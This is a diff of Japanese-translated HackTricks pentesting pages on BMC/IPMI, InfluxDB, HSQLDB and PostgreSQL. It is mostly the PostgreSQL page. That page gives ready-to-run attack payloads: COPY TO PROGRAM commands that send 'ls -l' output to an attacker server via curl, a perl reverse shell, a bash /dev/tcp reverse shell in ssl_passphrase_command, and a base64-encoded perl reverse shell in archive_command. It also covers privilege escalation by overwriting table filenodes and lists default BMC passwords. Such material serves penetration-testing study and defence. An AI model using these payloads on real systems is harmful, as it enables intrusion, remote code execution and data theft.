- **DellのiDRAC、IBMのIMM**、および**FujitsuのIntegrated Remote Management Controller**のような製品は、それぞれ「calvin」、「PASSW0RD」ゼロを含む、および「admin」のような簡単に推測可能なパスワードを使用しています。
@ -90,7 +88,7 @@ msf> use exploit/multi/upnp/libupnp_ssdp_overflow
## BMCを介してホストにアクセスする
Baseboard Management Controller (BMC)への管理アクセスは、ホストのオペレーティングシステムにアクセスするためのさまざまな経路を開きます。簡単なアプローチは、BMCのキーボード、ビデオ、マウスKVM機能を利用することです。これは、GRUBを介してホストをルートシェルに再起動する`init=/bin/sh`を使用か、リカバリディスクとして設定された仮想CD-ROMからブートすることで行えます。このような方法により、ホストのディスクを直接操作でき、バックドアの挿入、データ抽出、またはセキュリティ評価のために必要な任意のアクションを実行できます。ただし、これはホストの再起動を必要とし、重大な欠点です。再起動せずに実行中のホストにアクセスすることはより複雑で、ホストの構成によって異なります。ホストの物理コンソールまたはシリアルコンソールがログインしたままであれば、BMCのKVMまたはシリアルオーバーLANsol機能を介して`ipmitool`を使用して簡単に乗っ取ることができます。i2cバスやSuper I/Oチップのような共有ハードウェアリソースの悪用を探ることは、さらなる調査が必要な分野です。
Baseboard Management Controller (BMC)への管理アクセスは、ホストのオペレーティングシステムにアクセスするためのさまざまな経路を開きます。簡単なアプローチは、BMCのキーボード、ビデオ、マウスKVM機能を利用することです。これは、GRUBを介してホストをルートシェルに再起動する`init=/bin/sh`を使用か、リカバリディスクとして設定された仮想CD-ROMからブートすることで行えます。このような方法により、ホストのディスクを直接操作でき、バックドアの挿入、データ抽出、またはセキュリティ評価のために必要な任意のアクションを実行できます。ただし、これはホストの再起動を必要とし、重大な欠点です。再起動せずに実行中のホストにアクセスすることはより複雑で、ホストの構成によって異なります。ホストの物理コンソールまたはシリアルコンソールがログインしたままであれば、BMCのKVMまたはシリアルオーバーLANsol機能を介して`ipmitool`を使用して簡単に乗っ取ることができます。i2cバスやSuper I/Oチップのような共有ハードウェアリソースの悪用を探ることは、さらなる調査が必要な分野です。
## ホストからBMCにバックドアを導入する

15
src/network-services-pentesting/8086-pentesting-influxdb.md
View File

@ -1,11 +1,10 @@
# 8086 - Pentesting InfluxDB
{{#include ../banners/hacktricks-training.md}}
## 基本情報
**InfluxDB**は、InfluxDataによって開発されたオープンソースの**時系列データベースTSDB**です。TSDBは、タイムスタンプと値のペアで構成される時系列データの保存と提供に最適化されています。一般的なデータベースと比較して、TSDBは時系列データセットに対して**ストレージスペース**と**パフォーマンス**の大幅な改善を提供します。特化した圧縮アルゴリズムを使用し、古いデータを自動的に削除するように設定できます。特化したデータベースインデックスもクエリパフォーマンスを向上させます。
**InfluxDB** は、InfluxData によって開発されたオープンソースの **時系列データベース (TSDB)** です。TSDB は、タイムスタンプと値のペアからなる時系列データの保存と提供に最適化されています。一般的なデータベースと比較して、TSDB は時系列データセットの **ストレージスペース****パフォーマンス** において大幅な改善を提供します。特化した圧縮アルゴリズムを使用し、古いデータを自動的に削除するように設定できます。特化したデータベースインデックスもクエリパフォーマンスを向上させます。
**デフォルトポート**: 8086
```
@ -24,7 +23,7 @@ InfluxDBは認証を必要とする場合としない場合があります。
influx -host 'host name' -port 'port #'
> use _internal
```
このようなエラーが発生した場合: `ERR: unable to parse authentication credentials`それは**いくつかの認証情報を期待している**ことを意味します。
このようなエラーが発生した場合: `ERR: unable to parse authentication credentials`、**認証情報を期待している**ことを意味します。
```
influx username influx password influx_pass
```
@ -45,9 +44,9 @@ name
telegraf
_internal
```
#### テーブル/測定値表示
#### テーブル/測定値表示
The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) は、InfluxDBの**測定値**がSQLテーブルに相当することを説明しています。これらの**測定値**の命名法は、それぞれの内容を示しており、特定のエンティティに関連するデータを格納しています。
The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity.
```bash
> show measurements
name: measurements
@ -64,7 +63,7 @@ system
```
#### Show columns/field keys
フィールドキーはデータベースの****のようなものです
フィールドキーはデータベースの**カラム**のようなものです
```bash
> show field keys
name: cpu
@ -85,9 +84,9 @@ inodes_used integer
[ ... more keys ...]
```
#### テーブルのダンプ
#### Dump Table
最後に、次のようにして**テーブルをダンプ**できます。
そして最後に、次のようにして**テーブルをダンプ**できます。
```bash
select * from cpu
name: cpu

26
src/network-services-pentesting/9001-pentesting-hsqldb.md
View File

@ -1,16 +1,16 @@
# 9001 - Pentesting HSQLDB
{{#include ../banners/hacktricks-training.md}}
# 基本情報
## 基本情報
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** は、Javaで書かれた主要なSQLリレーショナルデータベースシステムです。メモリおよびディスクベースのテーブルを持ち、埋め込みモードとサーバーモードをサポートする、小型で高速なマルチスレッドおよびトランザクショナルなデータベースエンジンを提供します。
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** は、Javaで書かれた主要なSQLリレーショナルデータベースシステムです。小型で高速なマルチスレッドおよびトランザクショナルデータベースエンジンを提供し、インメモリおよびディスクベースのテーブルを持ち、埋め込みモードとサーバーモードをサポートしています。
**デフォルトポート:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# 情報
### デフォルト設定
## デフォルト設定
デフォルトでは、このサービスはメモリ内で実行されているか、localhostにバインドされている可能性があります。これを見つけた場合、別のサービスを悪用し、特権を昇格させようとしている可能性があります。
@ -22,15 +22,15 @@ grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
データベース名を注意深くメモしてください - 接続するために必要です。
# 情報収集
## 情報収集
[HSQLDBをダウンロード](https://sourceforge.net/projects/hsqldb/files/)して、`hsqldb/lib/hsqldb.jar`を抽出してDBインスタンスに接続します。`java -jar hsqldb.jar`を使用してGUIアプリを実行し、発見した/弱い資格情報を使用してインスタンスに接続します。
[HSQLDBをダウンロード](https://sourceforge.net/projects/hsqldb/files/)して、`hsqldb/lib/hsqldb.jar`を抽出することでDBインスタンスに接続します。`java -jar hsqldb.jar`を使用してGUIアプリ(うわっ)を実行し、発見した/弱い資格情報を使用してインスタンスに接続します。
接続URLはリモートシステムの場合、次のようになります: `jdbc:hsqldb:hsql://ip/DBNAME`
# トリック
## トリック
## Java言語ルーチン
### Java言語ルーチン
HSQLDBからJava言語ルーチンを使用してJavaクラスの静的メソッドを呼び出すことができます。呼び出されるクラスはアプリケーションのクラスパスに含まれている必要があることに注意してください。
@ -38,7 +38,7 @@ JRTは`functions`または`procedures`です。関数は、Javaメソッドが1
呼び出したいJavaメソッドがvoidを返す場合、`CALL`文で呼び出されるプロシージャを使用する必要があります。
## Javaシステムプロパティの読み取り
### Javaシステムプロパティの読み取り
関数を作成:
```text
@ -52,11 +52,11 @@ VALUES(getsystemproperty('user.name'))
```
システムプロパティの[リストはこちら](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html)で見つけることができます。
## ファイルにコンテンツを書き込む
### ファイルにコンテンツを書く
`com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Javaガジェットを使用して、カスタム手順を介して16進エンコードされたアイテムをディスクに書き込むことができます。このガジェットはJDKにありアプリケーションのクラスパスに自動的にロードされます**最大サイズは1024バイトです**。
`com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Javaガジェットを使用して、カスタム手順を介して16進エンコードされたアイテムをディスクに書き込むことができますJDKにあり、アプリケーションのクラスパスに自動的にロードされます**最大サイズは1024バイトです**。
手順を作成:
手順を作成します
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME

213
src/network-services-pentesting/pentesting-postgresql.md
View File

@ -1,13 +1,12 @@
# 5432,5433 - Pentesting Postgresql
{{#include ../banners/hacktricks-training.md}}
## **基本情報**
**PostgreSQL** は **オブジェクトリレーショナルデータベースシステム** として説明されており、**オープンソース** です。このシステムは SQL 言語を利用するだけでなく、追加機能で強化しています。その能力により、さまざまなデータ型や操作を処理できるため、開発者や組織にとって多用途な選択肢となっています。
**PostgreSQL** は **オブジェクトリレーショナルデータベースシステム** として説明されており、**オープンソース** です。このシステムは SQL 言語を利用するだけでなく、追加機能で強化しています。その機能により、幅広いデータ型と操作を処理できるため、開発者や組織にとって多用途な選択肢となっています。
**デフォルトポート:** 5432、もしこのポートがすでに使用されている場合、postgresql は使用されていない次のポート (おそらく 5433) を使用するようです。
**デフォルトポート:** 5432、もしこのポートがすでに使用されている場合、postgresql は使用されていない次のポート(おそらく 5433を使用するようです。
```
PORT STATE SERVICE
5432/tcp open pgsql
@ -53,9 +52,9 @@ SELECT * FROM pg_extension;
\s
```
> [!WARNING]
> **`\list`** を実行して **`rdsadmin`** というデータベースが見つかった場合、あなたは **AWS PostgreSQL データベース** 内にいることがわかります。
> **`\list`** を実行して **`rdsadmin`** というデータベースが見つかった場合、あなたは **AWS postgresql database** 内にいることがわかります。
**PostgreSQL データベースを悪用する方法** についての詳細は、以下を確認してください:
**PostgreSQLデータベースを悪用する方法**についての詳細は、以下を確認してください:
{{#ref}}
../pentesting-web/sql-injection/postgresql-injection/
@ -81,7 +80,7 @@ connect_timeout=10');
```
- ホストがダウンしています
`DETAIL: サーバーに接続できませんでした: ホストへのルートがありません "1.2.3.4" でサーバーが実行されていて、ポート 5678 で TCP/IP 接続を受け入れていますか?`
`DETAIL: サーバーに接続できませんでした: ホストへのルートがありません "1.2.3.4" でサーバーは稼働しており、ポート 5678 で TCP/IP 接続を受け入れていますか?`
- ポートが閉じています
```
@ -102,7 +101,7 @@ DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
PL/pgSQL関数では、現在例外の詳細を取得することはできません。ただし、PostgreSQLサーバーに直接アクセスできる場合は、必要な情報を取得できます。システムテーブルからユーザー名パスワードを抽出することが不可能な場合は、前のセクションで説明したワードリスト攻撃手法を利用することを検討してください。これは、ポジティブな結果をもたらす可能性があります。
PL/pgSQL関数では、現在例外の詳細を取得することはできません。ただし、PostgreSQLサーバーに直接アクセスできる場合は、必要な情報を取得できます。システムテーブルからユーザー名パスワードを抽出することが不可能な場合は、前のセクションで説明したワードリスト攻撃手法を利用することを検討してください。これは、ポジティブな結果をもたらす可能性があります。
## 権限の列挙
@ -112,13 +111,13 @@ PL/pgSQL関数では、現在例外の詳細を取得することはできませ
| -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
| rolsuper | ロールはスーパーユーザー権限を持っています |
| rolinherit | ロールは自動的にそのメンバーであるロールの権限を継承します |
| rolcreaterole | ロールは他のロールを作成できます |
| rolcreaterole | ロールは新しいロールを作成できます |
| rolcreatedb | ロールはデータベースを作成できます |
| rolcanlogin | ロールはログインできます。つまり、このロールは初期セッション認証識別子として指定できます |
| rolreplication | ロールはレプリケーションロールです。レプリケーションロールはレプリケーション接続を開始し、レプリケーションスロットを作成および削除できます。 |
| rolconnlimit | ログインできるロールに対して、このロールが作成できる同時接続の最大数を設定します。-1は制限なしを意味します。 |
| rolcanlogin | ロールはログインできます。つまり、このロールは初期セッション認証識別子として指定できます |
| rolreplication | ロールはレプリケーションロールです。レプリケーションロールはレプリケーション接続を開始し、レプリケーションスロットを作成および削除できます。 |
| rolconnlimit | ログインできるロールに対して、このロールが作成できる同時接続の最大数を設定します。-1は制限なしを意味します。 |
| rolpassword | パスワードではありません(常に`********`として読み取られます) |
| rolvaliduntil | パスワードの有効期限パスワード認証にのみ使用されます有効期限がない場合はnull |
| rolvaliduntil | パスワードの有効期限パスワード認証にのみ使用されます有効期限がない場合はnull |
| rolbypassrls | ロールはすべての行レベルセキュリティポリシーをバイパスします。詳細については[セクション5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)を参照してください。 |
| rolconfig | 実行時設定変数のロール固有のデフォルト |
| oid | ロールのID |
@ -126,11 +125,11 @@ PL/pgSQL関数では、現在例外の詳細を取得することはできませ
#### 興味深いグループ
- **`pg_execute_server_program`**のメンバーであれば、プログラムを**実行**できます
- **`pg_read_server_files`**のメンバーであれば、ファイルを**読み**取ることができます
- **`pg_write_server_files`**のメンバーであれば、ファイルを**書き**込むことができます
- **`pg_read_server_files`**のメンバーであれば、ファイルを**読み取る**ことができます
- **`pg_write_server_files`**のメンバーであれば、ファイルを**書き込む**ことができます
> [!NOTE]
> Postgresでは、**ユーザー**、**グループ**、および**ロール**は**同じ**です。これは**どのように使用するか**と、**ログインを許可するか**に依存します。
> [!TIP]
> Postgresでは、**ユーザー**、**グループ**、および**ロール**は**同じ**であることに注意してください。これは**どのように使用するか**と**ログインを許可するか**に依存します。
```sql
# Get users roles
\du
@ -188,7 +187,7 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';
```
### 機能
### 関数
```sql
# Interesting functions are inside pg_catalog
\df * #Get all
@ -212,7 +211,7 @@ SELECT * FROM pg_proc;
### ディレクトリとファイルの読み取り
この [**コミット** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)から、定義された **`DEFAULT_ROLE_READ_SERVER_FILES`** グループ(**`pg_read_server_files`** と呼ばれる)および **スーパーユーザー** は、任意のパスで **`COPY`** メソッドを使用できます(`genfile.c` `convert_and_check_filename` を確認してください):
この[**コミット**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)から、定義された**`DEFAULT_ROLE_READ_SERVER_FILES`**グループ(**`pg_read_server_files`**と呼ばれる)および**スーパーユーザー**は、任意のパスで**`COPY`**メソッドを使用できます(`genfile.c``convert_and_check_filename`を確認してください):
```sql
# Read file
CREATE TABLE demo(t text);
@ -261,7 +260,7 @@ GRANT pg_read_server_files TO username;
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
```
> [!WARNING]
> **`CREATEROLE`** 権限を持っているがスーパーユーザーでない場合、そのグループのメンバーになることができることを忘れないでください:
> あなたがスーパーユーザーでない場合でも、**`CREATEROLE`** 権限を持っていれば、**そのグループのメンバーになることができます:**
>
> ```sql
> GRANT pg_write_server_files TO username;
@ -269,8 +268,8 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
>
> [**詳細情報。**](pentesting-postgresql.md#privilege-escalation-with-createrole)
COPY は改行文字を処理できないため、base64 ペイロードを使用している場合でも、**1 行で送信する必要があります**。\
この技術の非常に重要な制限は、**`copy`バイナリファイルを書き込むために使用できないことです。なぜなら、いくつかのバイナリ値を変更するからです。**
COPYは改行文字を処理できないため、base64ペイロードを使用している場合でも、**1行で送信する必要があります**。\
この技術の非常に重要な制限は、**`copy`バイナリファイルを書き込むために使用できないことです。なぜなら、いくつかのバイナリ値を変更するからです。**
### **バイナリファイルのアップロード**
@ -280,19 +279,21 @@ COPY は改行文字を処理できないため、base64 ペイロードを使
../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
{{#endref}}
### ローカルファイル書き込みを介した PostgreSQL テーブルデータの更新
PostgreSQL サーバーファイルを読み書きするための必要な権限がある場合、[PostgreSQL データディレクトリ](https://www.postgresql.org/docs/8.1/storage.html)内の関連ファイルノードを**上書きすることによって、サーバー上の任意のテーブルを更新できます**。**この技術の詳細は** [**こちら**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)で確認できます。
### ローカルファイル書き込みを介したPostgreSQLテーブルデータの更新
PostgreSQLサーバーファイルを読み書きするための必要な権限がある場合、**関連するファイルノードを上書きすることによって、サーバー上の任意のテーブルを更新できます** [PostgreSQLデータディレクトリ](https://www.postgresql.org/docs/8.1/storage.html)で。**この技術の詳細は** [**こちら**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)で。
必要な手順:
1. PostgreSQL データディレクトリを取得する
1. PostgreSQLデータディレクトリを取得する
```sql
SELECT setting FROM pg_settings WHERE name = 'data_directory';
```
**注意:** 設定から現在のデータディレクトリパスを取得できない場合、`SELECT version()` クエリを通じて主要な PostgreSQL バージョンを照会し、パスをブルートフォースすることができます。Unix インストールの PostgreSQL の一般的なデータディレクトリパスは `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/` です。一般的なクラスター名は `main` です。
**注意:** 設定から現在のデータディレクトリパスを取得できない場合`SELECT version()`クエリを通じて主要なPostgreSQLバージョンを照会し、パスをブルートフォースすることを試みることができます。UnixインストールのPostgreSQLの一般的なデータディレクトリパスは`/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`です。一般的なクラスター名は`main`です。
2. 対象テーブルに関連付けられたファイルノードへの相対パスを取得する
@ -300,9 +301,9 @@ SELECT setting FROM pg_settings WHERE name = 'data_directory';
SELECT pg_relation_filepath('{TABLE_NAME}')
```
このクエリは `base/3/1337` のようなものを返すべきです。ディスク上のフルパスは `$DATA_DIRECTORY/base/3/1337`、すなわち `/var/lib/postgresql/13/main/base/3/1337` です。
このクエリは`base/3/1337`のようなものを返すべきです。ディスク上のフルパスは`$DATA_DIRECTORY/base/3/1337`、すなわち`/var/lib/postgresql/13/main/base/3/1337`です。
3. `lo_*` 関数を通じてファイルノードをダウンロードする
3. `lo_*`関数を通じてファイルノードをダウンロードする
```sql
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
@ -330,36 +331,36 @@ ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
```
5. [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)し、すべての `rol*` ブールフラグをフル権限のために 1 に設定します。
5. [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)し、すべての`rol*`ブールフラグを1に設定してフル権限を付与します。
```bash
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
```
![PostgreSQL Filenode Editor デモ](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
6. 編集したファイルノードを `lo_*` 関数を介して再アップロードし、ディスク上の元のファイルを上書きします
6. 編集したファイルノードを`lo_*`関数を介して再アップロードし、ディスク上の元のファイルを上書きします
```sql
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
```
7. _(オプション)_ 高コストの SQL クエリを実行してメモリ内のテーブルキャッシュをクリアします
7. _(オプション)_ 高コストのSQLクエリを実行してメモリ内のテーブルキャッシュをクリアします
```sql
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
```
8. これで、PostgreSQL更新されたテーブル値が表示されるはずです。
8. これで、PostgreSQL更新されたテーブル値が表示されるはずです。
`pg_authid` テーブルを編集することでスーパーユーザーになることもできます。**次のセクションを参照してください** [**以下のセクション**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
`pg_authid`テーブルを編集することでスーパーユーザーになることもできます。**次のセクションを参照してください** [**以下のセクション**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
## RCE
### **プログラムへの RCE**
### **プログラムへのRCE**
[バージョン 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以降、**スーパーユーザー**およびグループ **`pg_execute_server_program`** のメンバーのみが RCE のために copy を使用できます (例: 外部流出):
[バージョン9.3以降](https://www.postgresql.org/docs/9.3/release-9-3.html)、**スーパーユーザー**および**`pg_execute_server_program`**グループのメンバーのみがRCEのためにcopyを使用できます情報漏洩のための
```sql
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
```
@ -377,7 +378,7 @@ DROP TABLE IF EXISTS cmd_exec;
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
```
> [!WARNING]
> あなたがスーパーユーザーでない場合でも、**`CREATEROLE`** 権限を持っていると、**そのグループのメンバーになることができます:**
> あなたがスーパーユーザーでなくても、**`CREATEROLE`** 権限を持っている場合は、そのグループのメンバーになることができます:
>
> ```sql
> GRANT pg_execute_server_program TO username;
@ -386,88 +387,88 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
> [**詳細情報。**](pentesting-postgresql.md#privilege-escalation-with-createrole)
または、**metasploit** の `multi/postgres/postgres_copy_from_program_cmd_exec` モジュールを使用します。\
この脆弱性に関する詳細情報は [**こちら**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) にあります。CVE-2019-9193 として報告されましたが、Postges はこれを [機能であり修正しない](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/) と宣言しました。
この脆弱性に関する詳細情報は [**こちら**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) を参照してください。CVE-2019-9193として報告されましたが、Postgesはこれが[機能であり、修正されない](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)と宣言しました。
### PostgreSQL 言語による RCE
### PostgreSQL言語によるRCE
{{#ref}}
../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
{{#endref}}
### PostgreSQL 拡張機能による RCE
### PostgreSQL拡張機能によるRCE
前の投稿から **バイナリファイルをアップロードする方法****学んだ** ら、**PostgreSQL 拡張機能をアップロードして読み込むことで RCE を取得する** ことを試みることができます。
前の投稿から**バイナリファイルをアップロードする方法**を**学んだ**後、**PostgreSQL拡張機能をアップロードして読み込むことでRCEを取得する**ことを試みることができます。
{{#ref}}
../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
{{#endref}}
### PostgreSQL 設定ファイルによる RCE
### PostgreSQL設定ファイルによるRCE
> [!NOTE]
> 次の RCE ベクターは、すべてのステップがネストされた SELECT ステートメントを通じて実行できるため、制約のある SQLi コンテキストで特に便利です。
> [!TIP]
> 次のRCEベクターは、すべてのステップがネストされたSELECT文を通じて実行できるため、制約のあるSQLiコンテキストで特に便利です。
PostgreSQL**設定ファイル****postgres ユーザー** によって **書き込み可能** であり、これはデータベースを実行しているユーザーです。したがって、**スーパーユーザー** として、ファイルシステムにファイルを書き込むことができ、したがってこのファイルを **上書き** できます。
PostgreSQLの**設定ファイル**は、データベースを実行している**postgresユーザー**によって**書き込み可能**です。したがって、**スーパーユーザー**として、ファイルシステムにファイルを書き込むことができ、このファイルを**上書き**することができます。
![](<../images/image (322).png>)
#### **ssl_passphrase_command による RCE**
#### **ssl_passphrase_commandによるRCE**
この技術に関する詳細情報は [こちら](https://pulsesecurity.co.nz/articles/postgres-sqli) にあります
この技術に関する詳細情報は[こちら](https://pulsesecurity.co.nz/articles/postgres-sqli)を参照してください
設定ファイルには RCE に繋がるいくつかの興味深い属性があります:
設定ファイルには、RCEにつながるいくつかの興味深い属性があります:
- `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` データベースのプライベートキーへのパス
- `ssl_passphrase_command = ''` プライベートファイルがパスワードで保護されている場合暗号化されている、PostgreSQL**この属性に示されたコマンドを実行します**
- `ssl_passphrase_command_supports_reload = off` **この属性が** **on** の場合、パスワードで保護されたキーがあるときに **実行されるコマンド**`pg_reload_conf()`**実行されるときに** **実行されます**
- `ssl_passphrase_command = ''` プライベートファイルがパスワードで保護されている場合暗号化されている、PostgreSQLはこの属性に指定された**コマンドを実行します**
- `ssl_passphrase_command_supports_reload = off` この属性が**オン**の場合、パスワードで保護されたキーが**実行されるときに**実行される**コマンド**が`pg_reload_conf()`が**実行されるときに**実行されます
その後、攻撃者は次のことを行う必要があります:
そのため、攻撃者は次のことを行う必要があります:
1. **サーバーからプライベートキーをダンプ**
2. **ダウンロードしたプライベートキーを暗号化**
1. サーバーから**プライベートキーをダンプ**
2. ダウンロードしたプライベートキーを**暗号化**:
1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
3. **上書き**
4. **現在の PostgreSQL **設定をダンプ**
5. **前述の属性設定で **設定を上書き**
4. 現在のPostgreSQLの**設定をダンプ**
5. 言及された属性設定で**設定を上書き**:
1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
2. `ssl_passphrase_command_supports_reload = on`
6. `pg_reload_conf()` を実行
6. `pg_reload_conf()`を実行
これをテストしていると、**プライベートキー ファイルの権限が 640** である場合にのみ機能することに気付きました。これは **root に所有され**、**ssl-cert または postgres グループ** に属している必要がありますしたがって、postgres ユーザーが読み取れるように)、_ /var/lib/postgresql/12/main_ に配置されている必要があります。
これをテストしていると、**プライベートキーファイルの権限が640である場合**にのみ機能することに気付きました。これは**rootによって所有され**、**ssl-certまたはpostgresグループによって所有されている**したがって、postgresユーザーが読み取れる必要があります。また、_ /var/lib/postgresql/12/main_ に配置されている必要があります。
#### **archive_command による RCE**
#### **archive_commandによるRCE**
**この設定と WAL に関する** [**詳細情報はこちら**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
**この設定とWALに関する** [**詳細情報はこちら**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
設定ファイルで悪用可能な別の属性は `archive_command` です。
設定ファイルの別の悪用可能な属性は`archive_command`です。
これが機能するためには、`archive_mode` 設定が `'on'` または `'always'` である必要があります。それが真であれば、`archive_command` のコマンドを上書きし、WAL書き込みログ)操作を介して実行させることができます。
これが機能するためには、`archive_mode`設定が`'on'`または`'always'`である必要があります。それが真であれば、`archive_command`のコマンドを上書きし、WAL書き込み先行ログ)操作を介して実行させることができます。
一般的な手順は次のとおりです
一般的な手順は次のとおりです:
1. アーカイブモードが有効かどうかを確認します: `SELECT current_setting('archive_mode')`
2. ペイロードで `archive_command` を上書きします。例えば、リバースシェル `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. 設定をリロードします: `SELECT pg_reload_conf()`
4. WAL 操ションを強制的に実行し、アーカイブコマンドを呼び出します: `SELECT pg_switch_wal()` または一部の PostgreSQL バージョン用の `SELECT pg_switch_xlog()`
1. アーカイブモードが有効かどうかを確認: `SELECT current_setting('archive_mode')`
2. ペイロードで`archive_command`を上書きします。例えば、リバースシェル: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. 設定をリロード: `SELECT pg_reload_conf()`
4. WAL操作を強制的に実行し、アーカイブコマンドを呼び出します: `SELECT pg_switch_wal()` または一部のPostgresバージョンでは `SELECT pg_switch_xlog()`
#### **プリロードライブラリによる RCE**
#### **プリロードライブラリによるRCE**
この技術に関する詳細情報は [こちら](https://adeadfed.com/posts/postgresql-select-only-rce/) にあります
この技術に関する詳細情報は[こちら](https://adeadfed.com/posts/postgresql-select-only-rce/)を参照してください
この攻撃ベクターは、次の設定変数を利用します
この攻撃ベクターは、次の設定変数を利用します:
- `session_preload_libraries` -- クライアント接続時に PostgreSQL サーバーによって読み込まれるライブラリ。
- `dynamic_library_path` -- PostgreSQL サーバーがライブラリを検索するディレクトリのリスト。
- `session_preload_libraries` -- クライアント接続時にPostgreSQLサーバーによって読み込まれるライブラリ。
- `dynamic_library_path` -- PostgreSQLサーバーがライブラリを検索するディレクトリのリスト。
`dynamic_library_path` の値を、データベースを実行している `postgres` ユーザーによって書き込み可能なディレクトリ(例`/tmp/` ディレクトリ)に設定し、そこに悪意のある `.so` オブジェクトをアップロードします。次に、`session_preload_libraries` 変数に新しくアップロードしたライブラリを含めることで、PostgreSQL サーバーにそれを読み込ませます。
